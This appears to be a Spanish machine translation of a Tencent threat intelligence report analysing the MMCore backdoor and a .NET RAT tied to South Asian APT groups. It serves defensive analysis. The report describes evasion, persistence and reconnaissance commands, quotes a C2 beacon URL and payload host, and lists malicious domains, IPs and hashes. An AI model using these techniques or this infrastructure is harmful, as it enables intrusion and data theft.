1. Introducción de antecedentes
MMCore es un archivo malicioso interesante que descifra y ejecuta un archivo malicioso en la memoria después de que el descargador lo descarga. El archivo malicioso, también conocido como BaneChant, fue expuesto por primera vez por Fireeye en 2013. Además, Forcepoint también expuso algunos ataques a archivos maliciosos a principios de 2017.
La actividad de archivos maliciosos está principalmente activa en Asia, incluyendo China, Pakistán, Afganistán, Nepal, etc. Sin embargo, Forcepoint también mencionó que el ataque también incluye a África y los Estados Unidos. Los objetivos del ataque son principalmente objetivos militares, medios de comunicación, universidades, etc.
El ataque se remonta a 2013, hasta 2020, todavía existe. Aunque la tecnología no ha cambiado mucho, hay algunos cambios interesantes. Además, en términos de atribución, creemos que el archivo malicioso está relacionado con algunas organizaciones de ataque APT en India, incluidos los elefantes blancos, Man Linghua, Confucio, etc. Además, también descubrimos accidentalmente un arma de ataque no expuesta, una. RAT neta.
Segundo, análisis de tecnología de ataque.
El motivo del análisis es una publicación en Twitter de un investigador de seguridad:
Aunque hemos capturado este tipo de muestras innumerables veces y hemos encontrado la existencia de este archivo malicioso muchas veces durante el ataque, no hemos analizado ni rastreado sistemáticamente este archivo malicioso. Así que esta vez decidimos profundizar más para rastrear este interesante archivo malicioso.
Análisis de cargador 1.MMCore
Tomamos el siguiente archivo como ejemplo para el análisis:
Función general:
Contra la caja de arena: primero obtenga la ventana frontal, luego verifique si el puerto frontal cambia cada 1 segundo, si no cambia, luego detección de bucle infinito:
Detección antisoftware: detecte el módulo snxhk.dll (archivos relevantes del proveedor de seguridad Avast), si lo hay, demore 2 minutos:
Descifrar la URL de descarga, luego descargar y ejecutar en la memoria:
Método de almacenamiento:
Después del descifrado:
Descargar y ejecutar:
El shellcode está en offset + 0x14:
Análisis 2.MMCore
Primero detecte los dos procesos anti-software "avp" y "bdagent", y salga si se encuentra:
Luego usa dos rondas de xor para descifrar y obtener un dll:
El dll descifrado tiene capacidad de autocarga:
En dllmain, primero determine si el proceso cargado es rundll32.exe; de lo contrario, realice la operación de instalación de Troya:
Luego instale, primero ubíquese la sección ._code, que almacena un archivo PE:
Libere el archivo PE en C: \ ProgramData \ DailyUpdate \ opendrive64.dll:
Libere el archivo OneDrive (2) .lnk en el directorio de inicio para lograr la persistencia. El acceso directo de lnk apunta a rundll32.exe para cargar C: \ ProgramData \ DailyUpdate \ opendrive64.dll y llame a su función IntRun:
Inicie rundll32.exe para cargar C: \ ProgramData \ DailyUpdate \ opendrive64.dll y llame a su función IntRun:
La función de este archivo es similar a la del cargador. La función principal es extraer la carga útil de dailysync.zapto.org/fancycumti/combidation/scale.jpg y cargarla para garantizar que la carga útil en sí misma no tenga archivos. Cada vez que se carga el troyano, debe extraer la carga útil de la red. . Su función es la misma que la del cargador y el código es similar, por lo que no se analizará en detalle.
Comencemos a implementar una carga útil maliciosa real.
Primero cree Mutex 44cbdd8d470e88800e6c32bd9d63d341 para evitar operaciones repetidas:
Ejecute el comando para recopilar la información obtenida y cargue la información obtenida en el servidor C&C:
cmd.exe / q / c lista de tareas
cmd.exe / q / c ipconfig / all
cmd.exe / q / c dir C: \\
cmd.exe / q / c dir D: \\
cmd.exe / q / c dir E: \\
cmd.exe / q / c dir F: \\
cmd.exe / q / c dir G: \\
cmd.exe / q / c dir H: \\
La información recopilada se almacenará en el troyano temporal, nnp [4 dígitos aleatorio] .tmp:
Luego se leerá en la memoria, y luego se eliminará el archivo, y luego se obtendrá otra información y luego se empalmará, la información empalmada es la siguiente:
Luego comience a comunicarse con el servidor C&C:
Obtenga instrucciones, realice las siguientes operaciones de acuerdo con diferentes instrucciones:
La relación correspondiente entre comandos y funciones es la siguiente:
3. Historial de cambios y resumen
Se recuperó una gran cantidad de muestras MMcore de nuestra biblioteca de muestras. Realizamos un análisis inductivo de estas muestras y encontramos algunas reglas interesantes, que se resumen a continuación:
1. El origen del nombre.
El archivo malicioso se llamó MMcore por primera vez como un informe de análisis de la compañía de seguridad extranjera Forcepoint, pero el artículo no explicaba el origen del nombre. Después de nuestro seguimiento, se descubrió que en la versión original de MMcore, el nombre del mutex era "MM-Core-Running", por lo que supusimos que Forcepoint nombró el archivo malicioso MMCore:
Desde entonces, el autor ha generado cierta confusión y cambios en el nombre mutuamente exclusivo, como M1M-C1o1r1e-R1u1n1n1i1n1g1:
Hasta ahora, no hay sombra de MMCore en absoluto:
2. Cambio de marca
Además, del análisis detallado de MMCore anterior, se puede encontrar que el archivo malicioso tiene una versión y una etiqueta de versión obvias:
Enumeramos las etiquetas de muestra y la información de versión encontrada, la información específica es la siguiente:
Se puede encontrar que la etiqueta cambia con el tiempo. El número de la última versión actual es 2.5, y el nombre de la etiqueta es FreshPass.
3. Suma de codificación del algoritmo de descifrado
Una característica importante de MMCore es almacenar el shellcode en el archivo jpg descargado, aunque algunos jpgs no tienen el logotipo jpg:
Hay dos codificaciones principales de shellcode, Shikata ga nai y codificación ordinaria. El código Shikata ga nai es un código comúnmente usado para evitar matar la detección suave, y el código shell en el loto marino también usa este código.
Descifrado único xor:
Dos x o descifrado:
Múltiple descifrado xor:
- Preferencias del servidor C y C
Los grupos de ataque de MMCore prefieren nombres de dominio dinámico. Los nombres de dominio dinámico utilizados incluyen ddns.net, zapto.org, no-ip.org, redirectme.net, etc. Parte de la información se resume en la siguiente tabla:
4. Atribución de ataque
El Centro de Inteligencia de Amenazas de Tencent Security publicó una vez un artículo sobre la "Actividad de ataque más reciente del presunto grupo del elefante blanco contra Pakistán, Bangladesh y otros países del sur de Asia" en 2019. El artículo mencionaba el análisis de MMCore:
La ip de esta actividad se superpone con el elefante blanco analizado en este artículo.
Además, el análisis de la RAT en el artículo publicado por Chi Anxin "Análisis del ataque a Pakistán utilizando la vulnerabilidad del software InPage de la organización BITTER APT contra Pakistán y la asociación de pandillas" es consistente:
Entonces atribuimos el malware a organizaciones relevantes en India. Aunque todavía no está claro si MMCore es un grupo independiente, todavía pertenece a organizaciones como White Elephant, Man Linghua, donot y Confucius. Pero lo que es seguro es que estas organizaciones utilizarán el malware MMcore para atacar en algunas actividades importantes, al menos que MMCore comparte tecnología con estas organizaciones.
Además, también hay un descubrimiento, que todavía se basa en el último informe de la última actividad de ataque de la presunta organización de elefante blanco contra Pakistán, Bangladesh y otros países del sur de Asia por parte del Centro de Inteligencia de Seguridad y Amenazas de Tencent. El cebo de archivo utiliza un documento con macros para atacar. También encontramos archivos de macros similares en la biblioteca:
PakCERT-Snapchat hackeado por Pakistani Hacker Group.doc (92ee6729747e1f37dcae7b36d584760d)
El archivo malicioso publicado por el documento es una RAT escrita en .net:
El .net RAT es un RAT previamente no revelado y una de las armas de ataque convencionales de la organización.
El pdb del archivo es: d: \ KL \ rav \ rav \ obj \ Release \ rav.pdb
De manera similar, hay otra información de pdb: d: \ startnew \ JackSparow \ WinStore \ WinStore \ obj \ Release \ WinStore.pdb
Las funciones principales de esta RAT incluyen:
Descifrar C2:
El resultado de descifrado es "http://188.241.68.127/pmpk/", los parámetros de costura obtienen la URL completa, ejecutan el comando systeminfo para obtener la información del sistema y la puntada al final de la URL, la URL es la siguiente
http://188.241.68.127/pmpk/blue.php?MNVal=JNENIEYOU-PC&FNVal=ConnInfo&DVal=17_
V. Conclusión
El arsenal de ataque organizado por la APT ha evolucionado constantemente, incluidos los métodos de ataque, las herramientas de desarrollo, los idiomas, etc., y se agregarán constantemente nuevos arsenales de ataque. Algunos de los arsenales de ataque expuestos actualmente pueden ser solo la punta del iceberg en los ataques reales, pero a medida que se profundiza el seguimiento y se descubren más y más actividades de ataque, se expondrán más detalles.
Además, la atribución de actividades de ataque siempre ha sido un dolor de cabeza. En términos de propiedad de MMCore, no tenemos evidencia suficiente para demostrar que debe pertenecer a una organización, pero al menos se puede explicar que tiene al menos la superposición de infraestructura y la reutilización de arsenales de ataque con algunas organizaciones en la India. Esto también está relacionado con la compleja relación entre muchas organizaciones APT en India.
Hemos analizado más de una vez: existen ciertas asociaciones entre las organizaciones de Manlinghua, White Elephant, Confucio, donot, etc., y no se descarta que pertenezcan a la misma gran organización. Continuaremos rastreando la actividad de ataque de este archivo malicioso en un esfuerzo por aclarar la atribución.
Seis, recomendaciones de seguridad
El Centro de Inteligencia de Amenazas de Seguridad de Tencent recomienda que las empresas y agencias gubernamentales importantes de China permanezcan muy atentas contra los ataques APT. Puede consultar las siguientes sugerencias para mejorar la seguridad de los sistemas de información:
1. Se recomienda que el personal de capacitación en administración de redes de instituciones importantes no abra aleatoriamente archivos adjuntos de correo electrónico de fuentes desconocidas. Se recomienda no acceder a los archivos adjuntos cuando se desconoce el propósito del correo electrónico y el remitente.
2. Se recomienda que los usuarios empresariales utilicen el sistema de administración de seguridad del terminal Tencent Security T-Sec para parchear vulnerabilidades e instalar parches del sistema a tiempo para reducir el riesgo de ser atacado por vulnerabilidades. También tenga en cuenta que al abrir documentos de Office, evite habilitar el código de macro.
3. Se recomienda que los usuarios empresariales implementen el Sistema de detección de amenazas avanzado Tencent T-Sec (Tencent Yujie) para detectar ataques de hackers.
El sistema avanzado de detección de amenazas T-Sec de Tencent es un sistema único de inteligencia de amenazas y modelo de detección maliciosa desarrollado en base a las capacidades de seguridad de Tencent y que se basa en los datos masivos de Tencent en la nube y el final. Penetrar el riesgo de ataque. Enlace de referencia: https://cloud.tencent.com/product/nta
Otras plantillas sugeridas
7. Apéndice
1 、 COI
MMCore :
fa5ca2cba0dab28fa0fb93a9bd7b1d83
eecbfa73955218181b0bc27c9491bd03
0647bac99b6a8407795134f5d67d4590
0932b703849364ca1537305761bc3429
9e73734ac2ab5293c0f326245658b50e
b5c1b0137181cf818a46126ca613365e
263b6c350cbf7354b99139be17c272d3
9d7953cd0e67e6ebad049faba242a74b
30e519573d04a2e1505d8daafb712406
320e29f867ae579a9db0d04e998e5459
6303059930cfb785c5cf0af1512b2cbe
5024e86b00012a202d6aa55d5502b9e0
86e3e98c1e69f887e23d119d0d30d51c
5a489fb81335a13dff52678bbce69771
9782e1f021fff363b4a6ee196e1aa9cb
a469f3f7eda824bafb8e569deb05b07d
af501dfd35e7d04afd42d9178601a143
851ea11fa3cf5ca859dacf47d066d6df
bac7c5528767d86863532bd31bdd12e2
c0baa532636ecca97de85439d7ae8cb3
eecbfa73955218181b0bc27c9491bd03
d692a057330361f8f58163f9aa7fc3a8
f946ea7d9640023d06c2751dde195eb8
03fa06ac91685e0df4c635339e297e04
0490e54e4cce81d2ab24a6e7787fa595
060d13afdb2212a717666b251feda1d3
5a477d4574983c2603c6f05ff5bae01e
7d19f3547dc900eba548ee5ceb84edae
baa12a311b9029f33c4fc6de6fde06b0
bddb10729acb2dfe28a7017b261d63db
f3a7d55ee47f2b6bdf7ed6259a6f9496
423dbab9d632a1fc318f66dfc370ac28
b692a0f56d2462ba0ec50374c653b6e8
b3286791b22f515ab8d7f8866a154e9c
2826c9c6c25368f773c0e448572585d0
1e8915ccb433ce0406a98faa94db2237
8b2b4bed6db31739686531d11c9e98aa
c4cee8d6f30127938681c93dd19f2af4
0922a6d3d9d9a774eea90853a075056e
b4db105c90d2f2659fd4e930e0b7ad5b
65067f8c60cbc4ee459641c3b704e180
dailysync.zapto.org
abtprinting.com
adworks.webhop.me
ichoose.zapto.org
theglobalnews24x7.com
timpisstoo.hol.es
burningforests.com
account-support.site
noitfication-office-client.890m.com
mockingbird.no-ip.org
useraccount.co
nayanew1.no-ip.org
nakamini.ddns.net
adrev22.ddns.net
hawahawai123.no-ip.biz
waterlily.ddns.net
pressnorth.net
officeopenxml.co
jospubs.com
davidjone.net
themoondelight.com
g-img.no-ip.biz
adnetwork33.redirectme.net
plansecure.org
kibber.no-ip.org
.NET RAT:
0464acc5f3ea3d907ab9592cf5af2ff4
e223ff5a6a961a6c3ff30811e8a2ceb5
517c2c6e5e0f27f6f9c759a04a2bf612
b3a2e376a9a1f9e4d597eb8509aed57a
c69cd5894bdf4c92fcfb324e7db83ce3
f8da3eab85def2cdedd4227eec3114bb
73eb441bcf27a1ee4b1f5c1f78139b3b
5b1d7c4cea8fcb96696a6e9318d36a45
2cc9cd56b2e4c17b6b63bad4dfc5bc10
188.241.68.127
91.211.88.71
2. Materiales de referencia
https://s.tencent.com/research/report/711.html
https://www.forcepoint.com/blog/x-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose
https://twitter.com/KorbenD_Intel/status/1237121311450652672
